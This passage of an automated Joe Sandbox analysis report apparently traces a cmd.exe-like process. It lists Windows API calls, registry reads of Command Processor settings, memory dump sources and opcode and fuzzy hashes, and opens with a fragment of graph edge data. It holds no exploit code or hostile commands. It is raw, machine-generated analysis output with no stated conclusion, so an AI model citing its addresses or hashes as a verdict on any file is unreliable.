20536 b19cac longjmp 20535->20536 20553 b05e22 20536->20553 20541 b0e1c9 20537->20541 20542 b12a5b 20538->20542 20539 b0cc70 549 API calls 20539->20543 20540 b05e1d 20540->20429 20541->20545 20549 b0cc70 549 API calls 20541->20549 20619 b09907 20542->20619 20543->20534 20543->20539 20544 b0e1b4 20543->20544 20548 b0cf10 548 API calls 20544->20548 20545->20429 20547 b05da6 448 API calls 20547->20553 
realloc 22561->22562 22561->22563 22562->22563 22563->18675 22565 b16474 22564->22565 22566 b16464 NtOpenProcessToken 22564->22566 22570 b162fa 22565->22570 22574 b16500 NtQueryInformationToken 22565->22574 22566->22565 22569 b164a8 22569->22570 22571 b164bc NtClose 22569->22571 22570->18687 22570->18688 22571->22570 22573->18699 22575 b1648a 22574->22575 22576 b16534 22574->22576 22575->22569 22578 b164ca NtQueryInformationToken 22575->22578 22576->22575 22577 b22018 NtQueryInformationToken 22576->22577 22577->22575 22579 b164f3 22578->22579 22579->22569

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00B08791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00B06906,0000001F,?,00000080), ref: 00B08791
                                                                            • GetLocaleInfoW.KERNELBASE(00000000,0000001E,00B3C9E0,00000008), ref: 00B0859E
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 00B085BC
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00B08614
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00B08653
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,00B3C9D0,00000008), ref: 00B0867D
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,00B3C970,00000020), ref: 00B08698
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,00B3C930,00000020), ref: 00B086B0
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,00B3C8F0,00000020), ref: 00B086C8
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,00B3C8B0,00000020), ref: 00B086E0
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,00B3C870,00000020), ref: 00B086F8
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,00B3C830,00000020), ref: 00B08710
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,00B3C7F0,00000020), ref: 00B08728
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,00B3C9C0,00000008), ref: 00B08743
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,00B3C9B0,00000008), ref: 00B0875B
                                                                            • setlocale.MSVCRT ref: 00B08770
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale$DefaultUsersetlocale
                                                                            • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                            • API String ID: 1351325837-2236139042

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(?,?,00000000,00000000,00000000), ref: 00B10297
                                                                            • FindClose.KERNELBASE(00000000), ref: 00B102B0
                                                                            • memcpy.MSVCRT(?,?,?), ref: 00B10311
                                                                            • _wcsnicmp.MSVCRT ref: 00B10367
                                                                            • _wcsicmp.MSVCRT ref: 00B1E746
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                                                            • String ID:
                                                                            • API String ID: 242869866-0

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00B0A9C5), ref: 00B0A9D8
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00B0A9F3
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B0A9FA
                                                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 00B0AA09
                                                                            • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00B0AA12
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentHeapStrings$AllocateFreeProcessmemcpy
                                                                            • String ID:
                                                                            • API String ID: 429350006-0
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00016E70), ref: 00B16EC5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00B3CA04), ref: 00B087EE
                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B087FA
                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B0880E
                                                                            • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00B27460,00000001), ref: 00B0881B
                                                                            • _get_osfhandle.MSVCRT ref: 00B08828
                                                                            • GetConsoleMode.KERNELBASE(00000000), ref: 00B08830
                                                                            • _get_osfhandle.MSVCRT ref: 00B0883C
                                                                            • GetConsoleMode.KERNELBASE(00000000), ref: 00B08844
                                                                              • Part of subcall function 00B0E310: _get_osfhandle.MSVCRT ref: 00B0E318
                                                                              • Part of subcall function 00B0E310: SetConsoleMode.KERNELBASE(00000000), ref: 00B0E322
                                                                              • Part of subcall function 00B0E310: _get_osfhandle.MSVCRT ref: 00B0E32F
                                                                              • Part of subcall function 00B0E310: GetConsoleMode.KERNELBASE(00000000), ref: 00B0E339
                                                                              • Part of subcall function 00B0E310: _get_osfhandle.MSVCRT ref: 00B0E35E
                                                                              • Part of subcall function 00B0E310: GetConsoleMode.KERNELBASE(00000000), ref: 00B0E368
                                                                              • Part of subcall function 00B0E310: _get_osfhandle.MSVCRT ref: 00B0E390
                                                                              • Part of subcall function 00B0E310: SetConsoleMode.KERNELBASE(00000000), ref: 00B0E39A
                                                                              • Part of subcall function 00B0A9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00B0A9C5), ref: 00B0A9D8
                                                                              • Part of subcall function 00B0A9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00B0A9F3
                                                                              • Part of subcall function 00B0A9D4: RtlAllocateHeap.NTDLL(00000000), ref: 00B0A9FA
                                                                              • Part of subcall function 00B0A9D4: memcpy.MSVCRT(00000000,00000000,00000000), ref: 00B0AA09
                                                                              • Part of subcall function 00B0A9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00B0AA12
                                                                              • Part of subcall function 00B08B96: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,00B0885E), ref: 00B08B9D
                                                                              • Part of subcall function 00B08B96: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0885E), ref: 00B08BA4
                                                                              • Part of subcall function 00B08273: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 00B082D3
                                                                              • Part of subcall function 00B08273: RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00B08313
                                                                              • Part of subcall function 00B08273: RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 00B0834D
                                                                              • Part of subcall function 00B08273: RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 00B0839D
                                                                              • Part of subcall function 00B08273: RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 00B083D7
                                                                            • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00B0886A
                                                                            • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00B088A5
                                                                            • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000000,-00000105,00000000), ref: 00B08987
                                                                            • GetConsoleOutputCP.KERNELBASE(?,?,00000000,-00000105,00000000), ref: 00B089AB
                                                                            • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00B3C9F0), ref: 00B089BC
                                                                              • Part of subcall function 00B08572: GetLocaleInfoW.KERNELBASE(00000000,0000001E,00B3C9E0,00000008), ref: 00B0859E
                                                                              • Part of subcall function 00B08572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 00B085BC
                                                                              • Part of subcall function 00B08572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00B08614
                                                                              • Part of subcall function 00B08572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00B08653
                                                                              • Part of subcall function 00B08572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,00B3C9D0,00000008), ref: 00B0867D
                                                                              • Part of subcall function 00B08572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,00B3C970,00000020), ref: 00B08698
                                                                              • Part of subcall function 00B08572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,00B3C930,00000020), ref: 00B086B0
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 00B089CD
                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00B089D4
                                                                            • GetConsoleTitleW.KERNELBASE(00000000,00000104), ref: 00B089E9
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?), ref: 00B08A23
                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00B08A2A
                                                                            • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00B08AB5
                                                                            • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 00B08AC0
                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 00B08AD1
                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 00B08AE7
                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 00B08AF8
                                                                            • free.MSVCRT(?), ref: 00B08B18
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Console$Info$Locale$HeapMode_get_osfhandle$QueryValue$AddressCriticalProcProcessSection$AllocCommandEnvironmentFreeHandleLineStrings$AllocateBufferCtrlDirectoryEnterGlobalHandlerInitializeLeaveModuleOpenOutputScreenTitleWindowsfreememcpy
                                                                            • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                            • API String ID: 3313898297-3021193919
                                                                            • Opcode ID: 10064f11dd6be35d8b57ed57588e291ce91158815376329898c7e01f6069c7fe
                                                                            • Instruction ID: 5d10c3af432ab0a99c13a13cc9b3c4d30147f5f55dc7bc773b5e5230b99d9b83
                                                                            • Opcode Fuzzy Hash: 10064f11dd6be35d8b57ed57588e291ce91158815376329898c7e01f6069c7fe
                                                                            • Instruction Fuzzy Hash: 3791DE75A40300ABDB14ABA4AC5AA6E3FE9FB45700B1440A9F646DB2E1DF709B41CB16

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 00B082D3
                                                                            • RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00B08313
                                                                            • RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 00B0834D
                                                                            • RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 00B0839D
                                                                            • RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 00B083D7
                                                                            • RegQueryValueExW.KERNELBASE(?,CompletionChar,00000000,00000001,?,00001000), ref: 00B08427
                                                                            • RegQueryValueExW.KERNELBASE(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 00B08498
                                                                            • RegQueryValueExW.KERNELBASE(?,AutoRun,00000000,00000004,?,00001000), ref: 00B08526
                                                                            • RegCloseKey.KERNELBASE(?), ref: 00B0853A
                                                                            • time.MSVCRT(00000000), ref: 00B08554
                                                                            • srand.MSVCRT ref: 00B0855B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue$CloseOpensrandtime
                                                                            • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                            • API String ID: 145004033-3846321370
                                                                            • Opcode ID: 84b9f26750c40035d8e5d8641f5b34c34b5f98efd64d51f82fe7e0fd584e5a70
                                                                            • Instruction ID: 613758e905b8306a46d89e25fb7a9333a70df789f5556ce38609a2e7ec0ca67d
                                                                            • Opcode Fuzzy Hash: 84b9f26750c40035d8e5d8641f5b34c34b5f98efd64d51f82fe7e0fd584e5a70
                                                                            • Instruction Fuzzy Hash: D5C150359402A9EADF328B11DD45BD97BB8FB08702F5080D6E689A3190DBB09BC9CF55

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00B109CB
                                                                            • OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 00B109D8
                                                                              • Part of subcall function 00B0E2AF: SetThreadUILanguage.KERNELBASE ref: 00B0E2C6
                                                                            • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00B109ED
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 00B10A0A
                                                                            • _setjmp3.MSVCRT ref: 00B10A72
                                                                            • GetConsoleOutputCP.KERNELBASE ref: 00B10AA3
                                                                            • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00B3C9F0), ref: 00B10AB4
                                                                            • exit.KERNELBASE ref: 00B10ADA
                                                                            • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 00B1E9E1
                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00B1E9EA
                                                                              • Part of subcall function 00B11F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,00B1EF7C,?,00000000,00000000), ref: 00B11FB2
                                                                              • Part of subcall function 00B11F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,00B1EF7C,?,00000000,00000000), ref: 00B11FCE
                                                                              • Part of subcall function 00B11F1A: GetConsoleOutputCP.KERNELBASE(00B10A41), ref: 00B11F1A
                                                                              • Part of subcall function 00B11F1A: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00B3C9F0), ref: 00B11F2B
                                                                              • Part of subcall function 00B11F1A: memset.MSVCRT ref: 00B11F45
                                                                              • Part of subcall function 00B087CA: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00B3CA04), ref: 00B087EE
                                                                              • Part of subcall function 00B087CA: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B087FA
                                                                              • Part of subcall function 00B087CA: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B0880E
                                                                              • Part of subcall function 00B087CA: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00B27460,00000001), ref: 00B0881B
                                                                              • Part of subcall function 00B087CA: _get_osfhandle.MSVCRT ref: 00B08828
                                                                              • Part of subcall function 00B087CA: GetConsoleMode.KERNELBASE(00000000), ref: 00B08830
                                                                              • Part of subcall function 00B087CA: _get_osfhandle.MSVCRT ref: 00B0883C
                                                                              • Part of subcall function 00B087CA: GetConsoleMode.KERNELBASE(00000000), ref: 00B08844
                                                                              • Part of subcall function 00B087CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00B0886A
                                                                              • Part of subcall function 00B087CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00B088A5
                                                                            • _setjmp3.MSVCRT ref: 00B1EA5E
                                                                            Strings
                                                                            • DisableCMD, xrefs: 00B1E9D9
                                                                            • Software\Policies\Microsoft\Windows\System, xrefs: 00B10A00
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Console$CriticalQuerySectionThread$CommandInfoLineModeOpenOutputVirtual_get_osfhandle_setjmp3$CloseCtrlCurrentEnterHandlerHeapInformationInitializeLanguageLeaveValueexitmemset
                                                                            • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                            • API String ID: 4238206819-1920437939
                                                                            • Opcode ID: 55640ee790a6f1137efdb8549918f88b0473c47d7d1abbb346ef316458a78576
                                                                            • Instruction ID: 6c59d03361ec67e76ac186b9deb6bae7d8ed10a0b62a33a900de2c9b7a5d4751
                                                                            • Opcode Fuzzy Hash: 55640ee790a6f1137efdb8549918f88b0473c47d7d1abbb346ef316458a78576
                                                                            • Instruction Fuzzy Hash: E771D775560205AEEB11ABB49C869EF3BECFF15340B6445A9F912E31A1EF70CDC08B61

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B1011A
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001,?,?,00000000), ref: 00B10156
                                                                              • Part of subcall function 00B0EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00B2E590,00002000,?,00B48BF0,00000000,?,?,00B08F0D), ref: 00B0EC51
                                                                              • Part of subcall function 00B0EC2E: _wcsicmp.MSVCRT ref: 00B0EC77
                                                                              • Part of subcall function 00B0EC2E: _wcsicmp.MSVCRT ref: 00B0EC8D
                                                                              • Part of subcall function 00B0EC2E: _wcsicmp.MSVCRT ref: 00B0ECA3
                                                                              • Part of subcall function 00B0EC2E: _wcsicmp.MSVCRT ref: 00B0ECB9
                                                                              • Part of subcall function 00B0EC2E: _wcsicmp.MSVCRT ref: 00B0ECCF
                                                                              • Part of subcall function 00B0EC2E: _wcsicmp.MSVCRT ref: 00B0ECE5
                                                                              • Part of subcall function 00B0EC2E: _wcsicmp.MSVCRT ref: 00B0ECF7
                                                                              • Part of subcall function 00B0EC2E: _wcsicmp.MSVCRT ref: 00B0ED0D
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B101DB
                                                                            • exit.MSVCRT ref: 00B1E621
                                                                            • _wcsupr.MSVCRT ref: 00B1E683
                                                                            • _wcsicmp.MSVCRT ref: 00B1E71A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                                                            • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                            • API String ID: 2336066422-4197029667
                                                                            • Opcode ID: b6a39c6a90511e16ba47326d9d31264f10eb426254c4e4f0efc7190af5588dc8
                                                                            • Instruction ID: 7dc85eb5acfeb4008e4f2c26ac77ca1b450d1ca16207a73f52140ed2338edb4c
                                                                            • Opcode Fuzzy Hash: b6a39c6a90511e16ba47326d9d31264f10eb426254c4e4f0efc7190af5588dc8
                                                                            • Instruction Fuzzy Hash: A651D635B402169BDF24AB608C956FE7AE5EF60704FC444E8ED12A72C0EF74DEC18691

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00B15A2E: memset.MSVCRT ref: 00B15A5A
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000,?,00000104,?), ref: 00B08C7A
                                                                            • towupper.MSVCRT ref: 00B08C8F
                                                                            • iswalpha.MSVCRT ref: 00B08CA4
                                                                            • towupper.MSVCRT ref: 00B08CC4
                                                                            • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 00B08CF0
                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00B08D93
                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00B08DE0
                                                                            • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 00B08E11
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B1B6AB
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesCurrentDirectoryFilememsettowupper$ErrorFullLastNamePathiswalpha
                                                                            • String ID:
                                                                            • API String ID: 1133067188-0
                                                                            • Opcode ID: c4543f27f979b725e564c3cb3a36bff51d1e75c7ca03757ea1c2fef02a5056c9
                                                                            • Instruction ID: 7795ad41acdabe47d48eec40ae4123e96a160b68eeb0afbc16ef52d349705013
                                                                            • Opcode Fuzzy Hash: c4543f27f979b725e564c3cb3a36bff51d1e75c7ca03757ea1c2fef02a5056c9
                                                                            • Instruction Fuzzy Hash: C8B18D31A041159ADB28EB64DD85AFEB7F5EF24310F9446E9E45AE31E0EF309F80CA51

                                                                            Control-flow Graph (graph image not reproduced)

                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B0E318
                                                                            • SetConsoleMode.KERNELBASE(00000000), ref: 00B0E322
                                                                            • _get_osfhandle.MSVCRT ref: 00B0E32F
                                                                            • GetConsoleMode.KERNELBASE(00000000), ref: 00B0E339
                                                                            • _get_osfhandle.MSVCRT ref: 00B0E35E
                                                                            • GetConsoleMode.KERNELBASE(00000000), ref: 00B0E368
                                                                            • _get_osfhandle.MSVCRT ref: 00B0E390
